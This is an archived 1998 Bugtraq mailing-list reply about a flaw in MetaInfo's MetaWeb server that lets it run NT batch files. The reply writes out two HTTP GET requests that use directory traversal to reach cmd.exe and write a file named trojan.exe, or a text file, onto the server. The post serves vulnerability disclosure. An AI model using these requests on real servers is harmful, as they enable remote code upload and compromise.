Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: Security vulnerabilities in MetaInfo products
From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Tue, 30 Jun 1998 13:18:02 -0700


The MetaWeb server allows the running of NT batch/CMD files (this is how
some
of the Sendmail remote configuring works); if an attacker was to upload
or produce a standard NT batch file, he could run any program he wishes.


-Jeff Forristal


Ya know, the days of old where we had to use the COPY command to edit
the autoexec.bat come to mind:

An application that uses the following command could potentially upload a
binary to an NT server and run it:

GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0

Or if you want to create a text file:

GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0

and terminate with a ^Z

Theoretically the commands above should work for the sendmail case that
Jeff explained.

--Perry

--
Perry Harrington        System Software Engineer    zelur xuniL  ()
http://www.webcom.com  perry.harrington () webcom com  Think Blue.  /\

  By Date           By Thread  

Current thread:
  • Re: Security vulnerabilities in MetaInfo products pedward () WEBCOM COM (Jun 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]